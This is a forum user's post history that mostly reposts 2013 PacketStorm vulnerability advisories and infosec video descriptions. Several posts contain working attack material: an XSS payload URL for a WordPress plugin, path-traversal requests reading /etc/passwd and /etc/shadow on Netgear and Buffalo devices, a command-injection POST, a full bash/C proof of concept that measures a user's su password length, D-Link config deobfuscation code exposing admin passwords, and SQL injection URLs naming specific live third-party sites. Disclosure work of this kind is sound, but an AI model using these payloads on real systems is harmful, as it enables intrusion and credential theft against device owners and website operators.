Jump to content

Praetorian503

Active Members
 View Profile  See their activity

  • Posts

    578

  • Joined

  • Last visited

  • Days Won

    5

 Content Type 

Everything posted by Praetorian503

  1. Praetorian503
    WordPress WP-Table-Reloaded plugin version 1.9.4 suffers from a cross site scripting vulnerability in zeroclipboard.swf. # Exploit Title: Wordpress wp-table-reloadedþ plugin cross-site scripting in SWF # Release Date: 24/01/13 # Author: hip [Insight-Labs] # Contact: hip@insight-labs.org | Website: http://insight-labs.org # Software Link: http://downloads.wordpress.org/plugin/wp-table-reloaded.latest-stable.zip # Vendor Homepage: http://tobias.baethge.com/ # Tested on: XPsp3 # Infected version: 1.9.4 before # Google Dork: inurl:/wp-content/plugins/wp-table-reloaded/ ----------------------------------------------------------------------------------------------------------------------- # Introduction: WP-Table Reloaded enables you to create and manage tables, without having to write HTML code, and it adds valuable functions for your visitors. ------------------------------------------------------------------------------------------------------------------------- # XSS - Proof Of Concept: vulnerable path: /wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf vulnerabile parameter:id piece of code: flashvars = LoaderInfo(this.root.loaderInfo).parameters; this.domId = flashvars.id; <-- vulnerable input ExternalInterface.call("ZeroClipboard.dispatch", domId, "mouseOver", null); <- vulnerable call POC: /wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}// ------------------------------------------------------------------------------------------------------------------------- # Patch: -- Vendor was notified on the 23/01/2013 -- Vendor released version 1.9.4 on 27/01/2013 Fixed the bug -- Reward 50 USD from white fir design on 30/01/2013 ------------------------------------------------------------------------------------------------------------------------- Source: PacketStorm
  2. Praetorian503
    Netgear SPH200D suffers from cross site scripting, path disclosure, and directory traversal vulnerabilities. Device Name: SPH200D Vendor: Netgear ============ Vulnerable Firmware Releases: ============ Firmware Version : 1.0.4.80 Kernel Version : 4.1-18 Web Server Version : 1.5 ============ Device Description: ============ http://support.netgear.com/product/SPH200D ============ Shodan Torks ============ Shodan Search: SPH200D => Results 337 devices ============ Vulnerability Overview: ============ * directory traversal: Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device. Request: http://192.168.178.103/../../etc/passwd Response: HTTP/1.0 200 OK Content-type: text/plain Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 root:x:0:0:root:/root:/bin/bash demo:x:5000:100:Demo User:/home/demo:/bin/bash nobody:x:65534:65534:Nobody:/htdocs:/bin/bash If you request a directory you will get a very nice directory listing for browsing through the filesystem: /../../var/ HTTP/1.0 200 OK Content-type: text/html Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 <H1>Index of ../../var/</H1> <p><a href="/../../var/.">.</a></p> <p><a href="/../../var/..">..</a></p> <p><a href="/../../var/.Skype">.Skype</a></p> <p><a href="/../../var/jffs2">jffs2</a></p> <p><a href="/../../var/htdocs">htdocs</a></p> <p><a href="/../../var/cnxt">cnxt</a></p> <p><a href="/../../var/ppp">ppp</a></p> <p><a href="/../../var/conf">conf</a></p> <p><a href="/../../var/bin">bin</a></p> <p><a href="/../../var/usr">usr</a></p> <p><a href="/../../var/tmp">tmp</a></p> So with this information you are able to access the skype configuration with the following request: /../../var/.Skype/<user>/config.xml Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/LFI-01.preview.png * For changing the current password there is no request to the current password With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. * local path disclosure: Request: http://192.168.178.103/%3C/ Response: The requested URL '/var/htdocs/%3C/' was not found on this server. Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/local-path-disclosure.png * reflected Cross Site Scripting Appending scripts to the URL reveals that this is not properly validated for malicious input. http://192.168.178.102/network-dhcp.html4f951<script>alert(1)</script>e51c012502f Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/XSSed-IE6.png ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-002 Twitter: @s3cur1ty_de ============ Time Line: ============ August 2012 - discovered vulnerability 07.08.2012 - reported vulnerability to Netgear 08.08.2012 - case closed by Netgear 29.01.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
  3. Praetorian503
    This proof of concept exploit determines the password length of a local user who runs "su -". #!/bin/bash # ptmx-su-pwdlen.sh -- This PoC determine the password length of a local # user who runs "su -". Done thanks to the ptmx keystroke timing attack # (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for # more information. # # Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64). # # "THE BEER-WARE LICENSE" (Revision 42): # <vladz@devzero.fr> wrote this file. As long as you retain this notice # you can do whatever you want with this stuff. If we meet some day, and # you think this stuff is worth it, you can buy me a beer in return. -V. if ps -e -o cmd= | egrep -q "^(-|^)su"; then echo "[-] Kill/close all running \"su\" session before using this PoC" exit 1 fi exe=$(mktemp) || exit 1 tmp=$(mktemp) || exit 1 cat > ${exe}.c << _EOF_ #include <stdio.h> #include <signal.h> #include <unistd.h> #include <sys/inotify.h> static int count = 0; void display_result() { printf("[+] password len is %d\n", count-1); _exit(0); } int main() { int fd; char buf[1024]; signal(SIGINT, display_result); fd = inotify_init(); inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY); while(read(fd, buf, 1024)) count++; return 0; } _EOF_ cc -o ${exe}{,.c} echo "[*] Wait for someone to run \"su -\"" while true; do ps -e -o cmd= | egrep "^(-|^)su" >${tmp} x=$(wc -l ${tmp}) case ${x% *} in 1) (( run )) && continue; echo -n "[+] su detected, full command: " cat ${tmp}; ${exe} & (( run = 1 )) ;; 2) [ ! -z "$!" ] && kill -2 $!; break ;; esac done rm -f ${exe}{,.c} ${tmp} Source: PacketStorm
  4. Praetorian503
    The WordPress RLSWordPressSearch plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data. ############## # Exploit Title : Wordpress RLSWordPressSearch plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Home : ww.ashiyane.org # # Security Risk : MEdium - SQL Injection # # Dork : inurl:wp-content/plugins/RLSWordPressSearch/register.php?a= # ############## #Location:site/wp-content/plugins/RLSWordPressSearch/register.php?a=[num]&agentid=[SQL] # # #DEm0: # www.donahuere.com/DedhamrealEstate411/wp-content/plugins/RLSWordPressSearch/register.php?a=104267&agentid=117699%27 # # www.cbupton-massamont.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=105123&agentid=105458%27 # # www.melantoniore.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=117650&agentid=406671%27 # # www.selectrealestate.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?agentid=A210506%27 # # blog.century21denault.com/wp-content/plugins/RLSWordPressSearch/register.php?a=104286&agentid=104361%27 # # www.exitpremier.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=104563&agentid=104564%27 # # ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ############## Source: PacketStorm
  5. Praetorian503
    Description: Until now, getting into NFC/RFID hacking required enthusiasts to buy special hardware and learn about the underlying transfer protocols. No longer! NFCProxy is a new tool (being released at DEF CON 20) that allows you to proxy RFID transactions using Android phones. NFCProxy can record and replay RFID transactions from the perspective of the tag or the PCD (proximity coupling device). NFCProxy is an open source tool/framework that can be used to analyze 13.56?MHz RFID protocols and launch replay (and potentially man in the middle) attacks. You can even use NFCProxy as a virtual wallet by storing previously scanned RFID enabled credit cards and replaying them later at a POS (point of sale) terminal. No fancy equipment needed…just two NFC capable Android phones running ICS (one with a custom rom). Owning RFID enabled credit cards just got easier! Eddie Lee is a security researcher at Blackwing Intelligence. He specializes in application security, but is an enthusiast of all things related to security. From exploiting buffer overflows to building robots to messing with RFID, he just likes to figure out how things work (and how they break). Before Blackwing, Eddie was a member of the Security Research Group at Fortify software where he helped develop methods to detect vulnerabilities and attacks through static analysis and runtime analysis. Eddie has previously spoken at DEF CON and is a core member of Digital Revelation -- a two-time DEF CON CTF 1st place team Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Nfc Hacking: The Easy Way
  6. Praetorian503
    Description: SQLi remains a popular sport in the security arms-race. However, after analysis of hundreds of thousands of real world SQLi attacks, output from SQLi scanners, published reports, analysis of WAF source code, and database vendor documentation, both SQLi attackers and defenders have missed a few opportunities. This talk will iterate through the dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for regular-expression based WAFs. This will point the way for new directions in SQLi research for both offense and defense. Nick Galbreath is a director of engineering at Etsy, overseeing groups handling fraud, security, authentication and internal tools. Over the last 18 years, Nick has held leadership positions in number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has consulted for many more. He is the author of "Cryptography for Internet and Database Applications" (Wiley), and was awarded a number of patents in the area of social networking. He holds a master's degree in mathematics from Boston University. Twitter: @ngalbreath client9 https://github.com/client9 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli
  7. Praetorian503
    Inseamna ca eu nu mai stiu ce fac:-?? Cum sa minti in halul asta?!
  8. Praetorian503
    Description: Welcome to Part 3 in the Aircrack-ng Megaprimer series! In this video, I will be discussing aireplay-ng and its various attacks: Fake auth attack Deauth attack ARP replay Interactive replay Packet injection test If you have any questions regarding what is covered in the video, please ask them in the comment section below. Feedback is always welcome! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 3: Aireplay-Ng
  9. Praetorian503
    Description: In this video I will show you how to use SMTP User Enumeration tool. This tool I’m going to use on Gmail. First you need to know the smtp server check SMTP server ports and server name and use Nmap for Discovery the all the information about that host. Basically what you will get – You will get details like username Exist or if you search using domain name so it will looks like EX : - username.smtp.google.com = username@gmail.com Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Smtp User Enumeration On Gmail
  10. Praetorian503
    Description: In this video I will show you how to use Fern Wifi Cracker for WPA-2 Cracking. Fern Wifi is a very good tool for cracking wifi encryption. This tool is a fully automated and works very well if you give all the information current. This tool comes with some more features like HTTP/HTTPS and FTP cracking these features I will cover in the next video. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Crack Wpa-2 Encryption Using Fern Wifi Cracker
  11. Praetorian503
    Senzational. Instalezi Anonymous OS si esti mai monitorizat mult mai bine decat o face nenea de la SRI. //Edit: Nu stiu:-? Nu prea am incredere in acest OS.
  12. Praetorian503
    Screenshot About: Author: Praetorian Date: January 31, 2013 Hour: 10:46:58 PM Size: 284 KB (290,816 bytes) Content: Processes(Runing)(Refresh/End Process); Services Options(Task Manager(Enable/Disable), Control Panel(Enable/Disable), CMD(Enable/Disable), Folder Options(Enable/Disable), System Restore(Enable/Disable), Run(Enable/Disable), Registry Tools(Enable/Disable), Firewall(Enable/Disable)); System(Info/etc)(CPU/RAM(Core1,Core2,Ram Usage)), Drive(Disk(C/D(Memory))),Services(Open(Task Manager, System Restore, MsConfig, Regedit, Backup, Command Prompt)), SystemInfo(PC Name, User Name, OS Platform), Mouse Position(Set mouse position), File System(File system watching), Threading/TCP/Network Stream)). File Scanned NoVirusThanks Status: Detection rate: [COLOR="#00FF00"]0[/COLOR] on [COLOR="#00FF00"]14[/COLOR] ([COLOR="#00FF00"]0[/COLOR]%) Status: [COLOR="#00FF00"]CLEAN[/COLOR] Downlaod Link: x-Process v2.0
  13. Praetorian503
    A critical security vulnerability that allows a remote unauthenticated attacker to remotely execute arbitrary code under root privileges has been discovered in Broadcom's UPnP software. DefenseCode Security Advisory http://www.defensecode.com/ Broadcom UPnP Remote Preauth Root Code Execution Vulnerability Advisory ID: DC-2013-01-003 Advisory Title: Broadcom UPnP Remote Preauth Root Code Execution Vulnerability Advisory URL: http://www.defensecode.com/subcategory/advisories-28 Software: Broadcom UPnP software Vulnerable: Multiple router manufacturers Vendor Status: Vendors contacted Initial Release Date: 2013-01-15 Release Date Postponed To: 2013-01-31 Risk: Critical 1. General Overview =================== During the security evaluation of Cisco Linksys routers for a client, we have discovered a critical security vulnerability that allows remote unauthenticated attacker to remotely execute arbitrary code under root privileges. Upon initial vulnerability announcement a few weeks ago Cisco spokesman stated that only one router model is vulnerable - WRT54GL. We have continued with our research and found that, in fact, same vulnerable firmware component is also used in at least two other Cisco Linksys models - WRT54G3G and probably WRT310N. Could be others. Moreover, vulnerability turns out even more dangerous, since we have discovered that same vulnerable firmware component is also used across many other big-brand router manufacturers and many smaller vendors. Vulnerability itself is located in Broadcom UPnP stack, which is used by many router manufacturers that produce or produced routers based on Broadcom chipset. We have contacted them with vulnerability details and we expect patches soon. However, we would like to point out that we have sent more than 200 e-mails to various router manufacturers and various people, without much success. Some of the manufacturers contacted regarding this vulnerability are Broadcom, Asus, Cisco, TP-Link, Zyxel, D-Link, Netgear, US Robotics, and so on. Routers with vulnerable Broadcom UPnP stack are mostly based on Broadcom UPnP chipset. You can check how many manufacturers use Broadcom chipset here: http://wiki.openwrt.org/toh/start (search for Broadcom, brcm or bcm). We don't know exactly how many of them are affected, since we were unable to contact all of them, but we suspect there are probably tens of millions vulnerable routers out there. According to separate recent vulnerability disclosure by Rapid7 in another UPnP implementation (libupnp): "In all, 73 per cent of problems occur with products based on four SDKs, the report found. These are Portable SDK for UPnP Devices; MiniUPnP; a third, commercial stack that is likely developed by Broadcom; and another commercial SDK that could not be tracked to a specific developer." - Rapid7 Many routers have their UPnP interface available over the WAN interface, so the vulnerability can also be exploited over the internet. It seems that, at the moment, only popular UPnP implementation that's not hit by remote preauth security vulnerability is MiniUPnP. 2. Software Overview ==================== Broadcom UPnP is UPnP (Universal Plug and Play) protocol implementation developed by Broadcom, and often used on routers shipped with Broadcom chipset. Vulnerability described in this advisory is located within wanipc and wanppp modules of Broadcom UPnP stack. Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points and mobile devices to seamlessly discover each other's presence on the network and establish functional network services for data sharing, communications, and entertainment. 3. Vulnerability Description ============================ During the security analysis, we have discovered remote preauth format string vulnerability in Broadcom UPnP stack. Vulnerability can be exploited to write arbitrary values to arbitrary memory address, and also to remotely read router memory. When properly exploited, it allows unauthenticated attacker to execute arbitrary code under root account. Full exploit was previously demonstrated in the following video on Cisco Linksys WRT54GL, that is also based on Broadcom UPnP stack: http://www.youtube.com/watch?v=cv-MbL7KFKE. Vulnerability is present in SetConnectionType function of wanipc and wanppp modules. Vulnerability itself can be reached with a single SOAP request that calls SetConnectionType function. SetConnectionType: ------------------ <?xml version="1.0"?> <SOAP-ENV:Envelope...> <SOAP-ENV:Body> <m:SetConnectionType xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1" as=""> <NewConnectionType>#FORMAT_STRING#</NewConnectionType> </m:SetConnectionType> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ------------------ Format string output is available through GetConnectionTypeInfo SOAP request as presented below. GetConnectionTypeInfo: ------------------ <?xml version="1.0"?> <SOAP-ENV:Envelope...> <SOAP-ENV:Body> <m:GetConnectionTypeInfo xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"> </m:GetConnectionTypeInfo> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ------------------ Format string vulnerability is present because user-input from SOAP request is supplied as a format string argument to the snprintf() function in files wanipc.c and wanpp.c. Vulnerable code lines are located in the following files and code lines: /upnp/igd/wanipc.c: ------------------- static int SetConnectionType(UFILE *uclient, PService psvc, PAction ac, pvar_entry_t args, int nargs) { snprintf(psvc->vars[VAR_ConnectionType].value, sizeof(psvc->vars[VAR_ConnectionType].value), ac->params[0].value); return TRUE; } ------------------- /upnp/igd/wanppp.c: ------------------- int WANPPPConnection_SetConnectionType(UFILE *uclient, PService psvc, PAction ac, pvar_entry_t args, int nargs) /* "SetConnectionType", WANPPPConnection_SetConnectionType, */ { snprintf(psvc->vars[VAR_ConnectionType].value, sizeof(psvc->vars[VAR_ConnectionType].value), ac->params[0].value); return TRUE; } ------------------- 4. Solution =========== Since vulnerability is spread across multiple router manufacturers, and we were unable to reach all of them on this matter, it's unclear how long it will take certain manufacturers to patch it. Especially those that we were unable to contact. However, we're open to any questions from vendors regarding this vulnerability. Moreover, during the contact with one particular vendor, we were asked if the vulnerability is in <name-intentionally-removed> function. It wasn't. But that quickly led us to yet another vulnerability in also popular router software, obviously already reported to router manufacturers by someone, but still non-public. ADVISORY UPDATE: That turns out to be libupnp vulnerability disclosed by Rapid7. 5. The Exploit ============== We have developed working exploit as demonstrated in video http://www.youtube.com/watch?v=cv-MbL7KFKE, but because of the vulnerability impact and presence of this vulnerability across multiple router manufacturers, we won't publish the exploit. 6. Credits ========== Vulnerability discovered by Leon Juranic and Vedran Kajic. We would like to thank Kost for further help on shellcode development, and Davor Serfez for router debugging. Also, thanks to Armijn Hemel for helping us contacting some router manufacturers. 7. About DefenseCode ==================== DefenseCode is an information security consultancy company. DefenseCode provides security services and products designed for comprehensive security assessment of web applications, network and software products. DefenseCode is specialized in web application security and provides both static source code security analysis and dynamic web application security analysis security products. DefenseCode security products are designed for comprehensive security audit of web applications. Audit your web applications for SQL Injections, Cross Site Scripting, Code Execution, File Inclusion, and much, much more. E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com Source: PacketStorm
  14. Praetorian503
    Buffalo TeraStation TS-Series with firmware versions 1.5.7 and below suffer from file disclosure and command injection vulnerabilities. ************************************************************** Title: Buffalo TeraStation TS-Series multiple vulnerabilities Version affected: firmware version <= 1.5.7 Vendor: http://www.buffalotech.com/products/network-storage Discovered by: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Web: http://www.andreafabrizi.it Twitter: @andreaf83 Status: unpatched ************************************************************** Buffalo's TeraStation network attached storage (NAS) solutions offer centralized storage and backup for home, small office and business needs. The firmware is based on Linux ARM and most of the internal software is written using Perl. The vulnerabilities that I found allows any unauthenticated attacker to access arbitrary files on the NAS filesystem and execute system commands with root privileges. Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL with the latest firmware installed (v1.57). Surely other versions with the same firmware are vulnerable. 1]======== sync.cgi unauthenticated arbitrary file download ======== Requesting an unprotected cgi, it's possible, for an unauthenticated user, to download any system file, included /etc/shadow, that contains the password shadows for the application/system users. /cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow Moreover, using the key "all" it's possible to download the entire /var/log directory: /cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all 2]======== dynamic.pl NTP command injection ======== This vulnerability allows authenticated users to execute arbitrary commands on the system with root privileges. This is a sample request: ##################################### POST /dynamic.pl HTTP/1.1 Content-Length: 89 Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0 bufaction=setDTSettings&dateMethod=on &ip=www.google.it%26%26[COMMAND]>/tmp/output &syncFreq=1d ##################################### It's possible to view the command output using the previous vulnerability (reading the /tmp/output file). Source: PacketStorm
  15. Praetorian503
    Merge si cu asta:
  16. Praetorian503
    http://www.youtube.com/watch?feature=player_embedded&v=4zfAYGH60Sk Description: In this video I will show you how to attack on an smtp server for email password recovery. In this demo I'm going to use Hydra for brute-force attack and if your word list and password match so you will get the password it takes some time to crack but definitely you can crack the password using Hydra tool. I will perform an attack on three popular Mail Services Yahoo, Gmail, and Hotmail if you want to attack on other Mail services check ports and smtp server and use it same like other one. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Brute-Force Attack on Yahoo, Gmail, Hotmail - YouTube Source: Brute-Force Attack On Yahoo, Gmail, Hotmail
  17. Praetorian503
    Description: This talk details a selection of techniques for getting the data out of an Android device in order to perform forensic analysis. It covers cracking lockscreen passwords, creating custom forensic ramdisks, bypassing bootloader protections and stealth real-time data acquisition. We'll even cover some crazy techniques - they may get you that crucial data when nothing else will work, or they may destroy the evidence! Forensic practitioners are well acquainted with push-button forensics software. They are an essential tool to keep on top of high case loads -- plug in the device and it pulls out the data. Gaining access to that data is a constant challenge against sophisticated protection being built into modern smartphones. Combined with the diversity of firmware and hardware on the Android platform it is not uncommon to require some manual methods and advanced tools to get the data you need. This talk will reveal some of the techniques forensic software uses behind the scenes, and will give some insight into what methods and processes blackhats and law enforcement have at their disposal to get at your data. Free and Open Source tools will be released along with this talk to help you experiment with the techniques discussed. Note that this talk does not discuss Android analysis basics such as how to use ADB or what the SDK is - it is assumed you know these or can easily look them up afterwards. Thomas Cannon is the Director of Research and Development for viaForensics, a Chicago based digital forensics and security company. Thomas spends the majority of his time researching new mobile security, malware and forensics techniques and getting them into the hands of customers for commercial, research or military application. He conducts penetration testing and code analysis of mobile applications for clients in industries such as banking/finance and retail. Thomas is known for his research on Android having published advisories for new vulnerabilities and demonstrated attacks on the platform as well as providing some early guides on reverse engineering Android applications. Thomas has spoken at international conferences and presented to law enforcement on the topic of mobile forensics. Thomas has had a number of articles published in industry magazines and also been interviewed on national news programmes regarding vulnerabilities in payment systems and mobile technology. Twitter: @thomas_cannon https://viaforensics.com Home | thomascannon.net Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Into The Droid: Gaining Access To Android User Data
  18. Praetorian503
    Description: In this video I will show you how to use Volatility Framework for network information gathering from the memory and dump registry for password hashes and lot more. Commands for network and registry analysis. • Networking Connections To view the active connections. Connscan To find connection structures using pool tag scanning. Sockets To detect listening sockets for any protocol TCP, UDP, RAW. Sockscan To find socket structures using pool tag scanning. • Registry Hivescan To find the physical addresses of CMHIVEs registry hives in memory. Hivelist To locate the virtual addresses of registry hives in memory. Printkey To display the subkeys, values, data, and data types contained within a specified registry key. Hashdump To extract and decrypt cached domain credentials stored in the registry. Userassist To get the UserAssist keys from a sample you can use the userassist plugin Source : - CommandReference - volatility - Example usage cases and output for Volatility 2.0 commands - An advanced memory forensics framework - Google Project Hosting Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Volatility - Networking And Registry Usage
  19. Praetorian503
    Description: A new approach for web vulnerability scanning that outbids most existing scanners. Dan Zulla contributed to various open source vulnerability scanning projects and to the security of most international web hosting and virtualization companies. He did vulnerability scanner development, penetration testing and performance optimization in scaling environments for many years. Last year he built his first security research company and sold it in less than 8 months to a larger competitor at the age of 18. Twitter: @zulladan www.zulla.org Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Improving Web Vulnerability Scanning
  20. Praetorian503
    Description: As many in this community have echoed, shell is just the beginning. Owning a box is all well and good, but where do you go from there? Everyone has their own secret sauce for furthering their access after gaining a foothold. This talk will focus on the techniques, from simple to advanced, available for post exploitation using the Metasploit Framework. egypt is a software developer for Rapid7 where he is a core developer for the Metasploit Framework. Before devoting all his time to Metasploit, he was a Cybersecurity researcher for Idaho National Laboratory where he discovered numerous vulnerabilities in SCADA and Industrial Control Systems and probably didn't write Stuxnet. egypt has presented at DEF CON, BSidesLV, Black Hat, Derbycon and other venues. Note that egypt is not Egypt. The two can be distinguished easily by their relative beards -- Egypt has millions, while egypt only has the one. Twitter: @egyp7 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Improving Accuracy And Efficiency In Post Exploitation Metasploit Framework
  21. Praetorian503
    Description: This talk will discuss some ways to gain control over the virtual infrastructure through vCenter's services. I will describe a few non-dangerous bugs (they were 0-days when we found them), but if we can use all of them together, we will get administrative access to vCenter which means to the whole virtual network. Alexander Minozhenko works in the leading IT security company ERPScan as penetration tester. Alexander graduated in 2012 from St. Petersburg National Research University ITMO, faculty of computer science. Also he likes to participate in CTF competition. Twitter: @al3xmin Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: How To Hack Vmware Vcenter Server In 60 Seconds
  22. Praetorian503
    D-Link DCS Cameras suffer from authentication bypass and remote command execution vulnerabilities due to a remote information disclosure of the configuration. Unauthenticated remote access to D-Link DCS cameras =================================================== [ADVISORY INFORMATION] Title: Unauthenticated remote access to D-Link DCS cameras Discovery date: 20/06/2012 Release date: 28/01/2013 Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari) [VULNERABILITY INFORMATION] Class: Authentication bypass, Remote command execution [AFFECTED PRODUCTS] This security vulnerability affects the following products and firmware versions: * D-Link DCS-930L, firmware version 1.04 * D-Link DCS-932L, firmware version 1.02 Other products and firmware versions are probably also vulnerable, but they were not checked. [VULNERABILITY DETAILS] D-Link DCS web cameras allow unauthenticated attackers to obtain the configuration of the device remotely. A copy of the device configuration can be obtained by accessing the following URL: http://<device IP address>/frame/GetConfig The obtained configuration file is obfuscated using a trivial obfuscation scheme. Python code for the deobfuscation follows (sorry, the code is quite a mess ): <cut> # 'data' holds the content of the obfuscated configuration file def deobfuscate(data): r = [] for c in data: c = ord(c) c = (c + ord('y')) & 0xff c = (c ^ ord('Z')) & 0xff c = (c - ord('e')) & 0xff r.append(c) tmp = None i = len(r) - 1 while i >= 0: if i == len(r) - 1: x = r[i] tmp = ((x & 7) << 5) & 0xff if i == 0: assert tmp is not None x = r[0] x = (x >> 3) & 0xff x = (x + tmp) & 0xff r[0] = x else: c1 = r[i-1] c2 = r[i] c1 = c1 & 0x7 c2 = (c2 >> 3) & 0xff c1 = (c1 << 5) & 0xff c2 = (c2 + c1) & 0xff r[i] = c2 i = i - 1 r = "".join([chr(x) for x in r]) s = "" assert (len(r) % 2) == 0 for i in range(len(r)/2): s += r[i+(len(r)/2)] + r[i] return s </cut> The above procedure returns the deobfuscated ASCII version of the configuration file. This file includes, among other things, also the web password for the "admin" user. As a side note, it is worth considering that, after exploiting this issue, authenticated attackers can also leverage the undocumented /docmd.htm web page to execute arbitrary commands on the affected devices. [REMEDIATION] This issue has been addressed by D-Link in the following firmware releases: * DCS-930L V1.06B5 (August 15, 2012) * DCS-932L V1.04B5 (August 15, 2012) These updates are available through mydlink.com and have also been implemented on DCS-942L and higher camera products. [DISCLOSURE TIME-LINE] * 20/06/2012 - Initial vendor contact. * 11/07/2012 - The author provided D-Link with the details of the vulnerability. * 12/07/2012 - D-Link confirmed the issue is a new security vulnerability. * 26/01/2013 - D-Link confirmed the release of firmware versions that address the vulnerability. * 28/01/2013 - Public disclosure. [DISCLAIMER] The author is not responsible for the misuse of the information provided in this security advisory. The advisory is a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. Source: PacketStorm
  23. Praetorian503
    DataLife Engine version 9.7 suffers from a PHP code injection vulnerability in preview.php. ------------------------------------------------------------------ DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability ------------------------------------------------------------------ • Software Link: http://dleviet.com/ • Affected Version: 9.7 only. • Vulnerability Description: The vulnerable code is located in the /engine/preview.php script: 246. $c_list = implode (',', $_REQUEST['catlist']); 247. 248. if( strpos( $tpl->copy_template, "[catlist=" ) !== false ) { 249. $tpl->copy_template = preg_replace( "#\\[catlist=(.+?)\\](.*?)\\[/catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}')", $tpl->copy_template ); 250. } 251. 252. if( strpos( $tpl->copy_template, "[not-catlist=" ) !== false ) { 253. $tpl->copy_template = preg_replace( "#\\[not-catlist=(.+?)\\](.*?)\\[/not-catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}', false)", $tpl->copy_template ); 254. } User supplied input passed through the $_REQUEST['catlist'] parameter is not properly sanitized before being used in a preg_replace() call with the e modifier at lines 249 and 253. This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires a template which contains a “catlist” (or a “not-catlist”) tag. • Solution: Apply the vendor patch: http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html • Disclosure Timeline: [16/01/2013] – Vendor notified [19/01/2013] – Vendor patch released [20/01/2013] – CVE number requested [21/01/2013] – CVE number assigned [28/01/2013] – Public disclosure • CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1412 to this vulnerability. • Credits: Vulnerability discovered by Egidio Romano. • Original Advisory: http://karmainsecurity.com/KIS-2013-01 Source: PacketStorm
  24. Praetorian503
